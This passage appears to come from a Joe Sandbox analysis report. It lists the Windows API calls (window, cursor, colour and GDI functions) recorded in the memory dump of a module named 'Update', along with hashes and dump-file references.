                                              • ScreenToClient.USER32(?,?), ref: 6C1D8CFE
                                              • EqualRect.USER32(?,?), ref: 6C1D8D09
                                              • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 6C1D8D30
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?,?,00000000), ref: 6C1D8D3A
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$ClientRectScreen$DeferEqualParent
                                              • String ID:
                                              • API String ID: 443303494-0
                                              • Opcode ID: 3e531a6d9b03be8373b38d61d0980411cd1c31defef9bcacd6fc32f25156550f
                                              • Instruction ID: c18f05005920a0c54b1f5bd64d9cfaacfe9a6c4ee0356f64314eb50a577d2dea
                                              • Opcode Fuzzy Hash: 3e531a6d9b03be8373b38d61d0980411cd1c31defef9bcacd6fc32f25156550f
                                              • Instruction Fuzzy Hash: 7C215E75A01509EFEF00DFA8C884EAEBBBCFF1A705B11411AF902EB150D770A940CBA1
                                              APIs
                                              • SelectObject.GDI32(00000000,?), ref: 6C24CA0B
                                                • Part of subcall function 6C1E9631: DeleteObject.GDI32(6C1D13E5), ref: 6C1E9643
                                              • SelectObject.GDI32(?,?), ref: 6C24CA20
                                              • DeleteObject.GDI32(00000000), ref: 6C24CA81
                                              • DeleteDC.GDI32(00000000), ref: 6C24CA90
                                              • LeaveCriticalSection.KERNEL32(6C3A1B70), ref: 6C24CAA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Object$Delete$Select$CriticalLeaveSection
                                              • String ID:
                                              • API String ID: 3849354926-3916222277
                                              • Opcode ID: f9f025e4c08a2deb6349c877748dcfe4243a2c504614e3704c3bfcb104542ba7
                                              • Instruction ID: 5dfc4b499783f6ea2de92831d9885e10d63dc4a6816d693efd44b97a9c16549a
                                              • Opcode Fuzzy Hash: f9f025e4c08a2deb6349c877748dcfe4243a2c504614e3704c3bfcb104542ba7
                                              • Instruction Fuzzy Hash: 9F215431601205CFDF00EFA8C884B9A3779FF02329F108224FD169A5A6D7709889CB51
                                              APIs
                                              • SetCapture.USER32(?), ref: 6C2304D7
                                              • GetCursorPos.USER32(?), ref: 6C23051A
                                              • LoadCursorW.USER32(00000000,00007F86), ref: 6C23055C
                                              • SetCursor.USER32(00000000), ref: 6C230563
                                              • GetCursorPos.USER32(?), ref: 6C230570
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Cursor$CaptureLoad
                                              • String ID: 0^5l
                                              • API String ID: 1460996051-1366870978
                                              • Opcode ID: 31457687380a6353f88548e43f9e58937b5a5c672ca2c19db5dac69a13a09714
                                              • Instruction ID: 21b215383ff5f0aecaa36629727b2ee2e47c7f6c329b57f877001c3aa372cbf1
                                              • Opcode Fuzzy Hash: 31457687380a6353f88548e43f9e58937b5a5c672ca2c19db5dac69a13a09714
                                              • Instruction Fuzzy Hash: A8218C7570275AAFEF099BA1C808BEDBBB9BF4A705F040115ED0A87341CF74A9118BA1
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C22C590
                                                • Part of subcall function 6C1C9B7C: __EH_prolog3.LIBCMT ref: 6C1C9B83
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID: AQUA_$BLACK_$BLUE_$IDX_OFFICE2007_STYLE$SILVER_
                                              • API String ID: 431132790-2717817858
                                              • Opcode ID: 135aa30a895b7dc002a73d6dd73f8df690fcb39b17ad870bac1db53e43a559fc
                                              • Instruction ID: 0e1bf2fc3fa8a6d7671d254e66250a4b3bfc13901a0f463b96c5e374b01ac8dc
                                              • Opcode Fuzzy Hash: 135aa30a895b7dc002a73d6dd73f8df690fcb39b17ad870bac1db53e43a559fc
                                              • Instruction Fuzzy Hash: 3C110B7690010ADBDF00EBA8C940BFE7B71AF94618F144206F911ABB80CF38CA15CB22
                                              APIs
                                              • GetModuleHandleW.KERNEL32(user32.dll,?,?,00000000,?,6C1D643E,00000000,00000000), ref: 6C1D6DC5
                                              • GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 6C1D6DD7
                                              • GetProcAddress.KERNEL32(00000000,UnregisterTouchWindow), ref: 6C1D6DE5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleModule
                                              • String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
                                              • API String ID: 667068680-2470269259
                                              • Opcode ID: f21789d779be332c09826611a5f5c4f3064a7a2ccf4f8b7df02d3231a824fece
                                              • Instruction ID: 646c55ec4b20147b7a05dd5755522e86ebe22b8d40d9eee9c78233d919fde3be
                                              • Opcode Fuzzy Hash: f21789d779be332c09826611a5f5c4f3064a7a2ccf4f8b7df02d3231a824fece
                                              • Instruction Fuzzy Hash: 7401FE3260161ABFCB019BA5CC9869EBEBDFF1E315F010535E909D2D00DF74D8108AE0
                                              APIs
                                              • GetSysColor.USER32(0000000F), ref: 6C1ECA82
                                              • GetSysColor.USER32(00000010), ref: 6C1ECA8D
                                              • GetSysColor.USER32(00000014), ref: 6C1ECA98
                                              • GetSysColor.USER32(00000012), ref: 6C1ECAA3
                                              • GetSysColor.USER32(00000006), ref: 6C1ECAAE
                                              • GetSysColorBrush.USER32(0000000F), ref: 6C1ECAB9
                                              • GetSysColorBrush.USER32(00000006), ref: 6C1ECAC4
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Color$Brush
                                              • String ID:
                                              • API String ID: 2798902688-0
                                              • Opcode ID: 47183db1da129f3729bfdd3b415f516c0403255a2a0601d2a187082501cb636b
                                              • Instruction ID: 3fb1f43e78a6e5bd0e40f3ac1ad4c84393816d5ad5f1ee08dfe6da1609b8a15b
                                              • Opcode Fuzzy Hash: 47183db1da129f3729bfdd3b415f516c0403255a2a0601d2a187082501cb636b
                                              • Instruction Fuzzy Hash: 15F09E71A437089BEB206FB1A54D7C6BEF4BF5AB11F040919E3478B980D7F590809F00
                                              APIs
                                              • GetParent.USER32(00000000), ref: 6C1FAE42
                                              • GetClientRect.USER32(?,6C1FA694), ref: 6C1FAE55
                                              • GetWindowRect.USER32(00000000,?), ref: 6C1FAE9F
                                              • GetParent.USER32(00000000), ref: 6C1FAEA8
                                              • GetParent.USER32(00000000), ref: 6C1FB13B
                                              • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000000,?,?,?,?,?,?,?,6C1FA694,00000000), ref: 6C1FB16B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Parent$RectWindow$ClientRedraw
                                              • String ID:
                                              • API String ID: 443302174-0
                                              • Opcode ID: 150c35985385f64f4887d19fbef43e007473a9c3fdfb02be9902e0e7f15963ff
                                              • Instruction ID: b3427528b2c003de5f0187397340d06c7a1f12210f9c59a0e9eeb338a8ce0664
                                              • Opcode Fuzzy Hash: 150c35985385f64f4887d19fbef43e007473a9c3fdfb02be9902e0e7f15963ff
                                              • Instruction Fuzzy Hash: 53D16A35A00619DFDF05CFA4C884BEDBBF5BF4A310F2541A9E826AB690CB34A941CF55
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Rect$ClientInflate
                                              • String ID:
                                              • API String ID: 256450704-0
                                              • Opcode ID: ff9cc2ec63f2ca7540fe5c426450996406eaba11b3d35cc63729e071a996136f
                                              • Instruction ID: 1548a616608b2d233ecf722fa79374b3b9788c5c005fddbfac557c775bd4cf97
                                              • Opcode Fuzzy Hash: ff9cc2ec63f2ca7540fe5c426450996406eaba11b3d35cc63729e071a996136f
                                              • Instruction Fuzzy Hash: AB714831F016099FDB04CFA9C844ADEB7F6BF59304F24816AE819EB210D735AA02CB91
                                              APIs
                                              • GetParent.USER32(00000000), ref: 6C1FA554
                                              • SendMessageW.USER32(?,0000040C,00000000,00000000), ref: 6C1FA590
                                              • SendMessageW.USER32(00000000,0000041C,00000000,?), ref: 6C1FA5C3
                                              • SetRectEmpty.USER32(?), ref: 6C1FA629
                                              • SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 6C1FA685
                                              • RedrawWindow.USER32(00000000,00000000,00000000,00000505), ref: 6C1FA6B4
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: MessageSend$EmptyParentRectRedrawWindow
                                              • String ID:
                                              • API String ID: 3879113052-0
                                              • Opcode ID: f3b72a70ad676fe1cf66286794ae58281633b08cc9278d768cba836c0785e37f
                                              • Instruction ID: e5cf1bf0a8d0a99b325d39d115d89c424c91c3c69d546cdf1bbee4a7ccfe3b28
                                              • Opcode Fuzzy Hash: f3b72a70ad676fe1cf66286794ae58281633b08cc9278d768cba836c0785e37f
                                              • Instruction Fuzzy Hash: A1518D71B016199FDB19CFA4C894BADBBB9FF49304F214129E916A7790DB34A905CF80
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C1F4C2A
                                              • GlobalAlloc.KERNEL32(00000040,00000004), ref: 6C1F4D91
                                              • GlobalLock.KERNEL32(00000000), ref: 6C1F4D9E
                                              • GlobalUnlock.KERNEL32(00000000), ref: 6C1F4DAF
                                              • SetPropW.USER32(?,00000000), ref: 6C1F4DBF
                                              • GlobalFree.KERNEL32(00000000), ref: 6C1F4DCA
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Global$AllocFreeH_prolog3LockPropUnlock
                                              • String ID:
                                              • API String ID: 2329575679-0
                                              • Opcode ID: 8367dbd3e4763275f08a6d858b5aac48b7685934547a1d1250e896f996d5aa89
                                              • Instruction ID: bbcc6b01b6f92e990913f9bd8fe0308b1929d6f803a778c80865330c5119cbf4
                                              • Opcode Fuzzy Hash: 8367dbd3e4763275f08a6d858b5aac48b7685934547a1d1250e896f996d5aa89
                                              • Instruction Fuzzy Hash: 1441E0717016059BDB04DFB58954BDE7BB8BF55328F10021AEA2ADBB90CF35D816CBA0
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C224B2A
                                              • SetWindowRgn.USER32(00000000,00000000,00000001), ref: 6C224BA4
                                              • CreateRoundRectRgn.GDI32(00000000,00000000,?,?,00000009,00000009), ref: 6C224BE1
                                              • CreateRectRgn.GDI32(00000000,00000009,?,?), ref: 6C224C18
                                              • CombineRgn.GDI32(?,?,00000000,00000002), ref: 6C224C32
                                              • SetWindowRgn.USER32(00000000,00000000,00000001), ref: 6C224C55
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CreateRectWindow$CombineH_prolog3Round
                                              • String ID:
                                              • API String ID: 941439308-0
                                              • Opcode ID: 3e2f8f718b18ea4f3c8c199c4313d9181d1ffbc0f949b28ea2326416a2921cea
                                              • Instruction ID: 641664d99c406a1f2f374c735d3ff3a795520194a0e6c1897c7f5266e21c96c7
                                              • Opcode Fuzzy Hash: 3e2f8f718b18ea4f3c8c199c4313d9181d1ffbc0f949b28ea2326416a2921cea
                                              • Instruction Fuzzy Hash: 5E31A271A0170AABEF01DFA4CD54FEF77B8AF06719F104519B812E6AC0DB788905CB61
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Capture$Message$Dispatch
                                              • String ID:
                                              • API String ID: 3654672037-0
                                              • Opcode ID: dad7d3cb7fe23461a37b66e2a9028485582572fadf9100c790f862999b6f8241
                                              • Instruction ID: 084aade8e55d1f0992baa9f9aabd91afeeeca002661441d4a8fc266b8e292171
                                              • Opcode Fuzzy Hash: dad7d3cb7fe23461a37b66e2a9028485582572fadf9100c790f862999b6f8241
                                              • Instruction Fuzzy Hash: 883107316592CE9BCF109B78C408E9F77F8BB82309B10441AFE16D2E04DF309464C761
                                              APIs
                                              • GetWindowRect.USER32(00000000,?), ref: 6C20CBC6
                                              • OffsetRect.USER32(?,?,?), ref: 6C20CBE7
                                              • SendMessageW.USER32(00000000,0000000B,00000000,00000000), ref: 6C20CBF4
                                              • IsWindowVisible.USER32(00000000), ref: 6C20CBFD
                                              • SendMessageW.USER32(00000000,0000000B,00000001,00000000), ref: 6C20CC70
                                              • RedrawWindow.USER32(00000000,00000000,00000000,00000105), ref: 6C20CC80
                                                • Part of subcall function 6C1E51FB: ShowWindow.USER32(?,00000000,?,?,6C1E29E0,00000000), ref: 6C1E520C
                                                • Part of subcall function 6C1E519E: SetWindowPos.USER32(?,00000000,?,00000000,00000115,00000000,00000000,?,?,6C1E2831,00000000,00000002,00000002,00000000,00000000,00000115), ref: 6C1E51C6
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$MessageRectSend$OffsetRedrawShowVisible
                                              • String ID:
                                              • API String ID: 2359670889-0
                                              • Opcode ID: bbfe3b05db231168c7436fbb08e54d7af18d049e4ff41f1419c49cdbf111f8b3
                                              • Instruction ID: 80776ad413d102a8d164c77e96f464cf2da52dd9f8e3c75e50f30f758ec4b1cf
                                              • Opcode Fuzzy Hash: bbfe3b05db231168c7436fbb08e54d7af18d049e4ff41f1419c49cdbf111f8b3
                                              • Instruction Fuzzy Hash: 10312D72A00609BFEB11DFA8CD85EBFBBBDFB49704F000619B646E6190D770AD009B21
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 6C1D48AE
                                              • GetWindow.USER32(?,00000005), ref: 6C1D48C5
                                              • GetWindowRect.USER32(00000000,?), ref: 6C1D48E0
                                                • Part of subcall function 6C1CD2F4: ScreenToClient.USER32(?,00000000), ref: 6C1CD303
                                                • Part of subcall function 6C1CD2F4: ScreenToClient.USER32(?,00000008), ref: 6C1CD310
                                              • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 6C1D4906
                                              • GetWindow.USER32(00000000,00000002), ref: 6C1D490F
                                              • ScrollWindow.USER32(?,?,?,?,?), ref: 6C1D492B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$ClientScreen$RectScrollVisible
                                              • String ID:
                                              • API String ID: 1714389229-0
                                              • Opcode ID: 376445beb40744b71d2a253817e76e15064e1e290a90f805855a9541088d9d0f
                                              • Instruction ID: d9f92c942f9b770fab6c45e3f5e5862ac961b57b79142754aa8367d808227b48
                                              • Opcode Fuzzy Hash: 376445beb40744b71d2a253817e76e15064e1e290a90f805855a9541088d9d0f
                                              • Instruction Fuzzy Hash: 6D219E35600609AFDF01DF65CC88AAFBBB9FF8A704B154119FA06A7610EB70ED018B50
                                              APIs
                                                • Part of subcall function 6C206B59: IsWindow.USER32(?), ref: 6C206B65
                                              • SendMessageW.USER32(00000020,0000020A,?,?), ref: 6C25C91E
                                              • GetFocus.USER32 ref: 6C25C93C
                                              • IsChild.USER32(00000020,?), ref: 6C25C959
                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C25C973
                                              • IsWindowVisible.USER32(?), ref: 6C25C98C
                                              • SendMessageW.USER32(?,0000020A,?,?), ref: 6C25C9AA
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
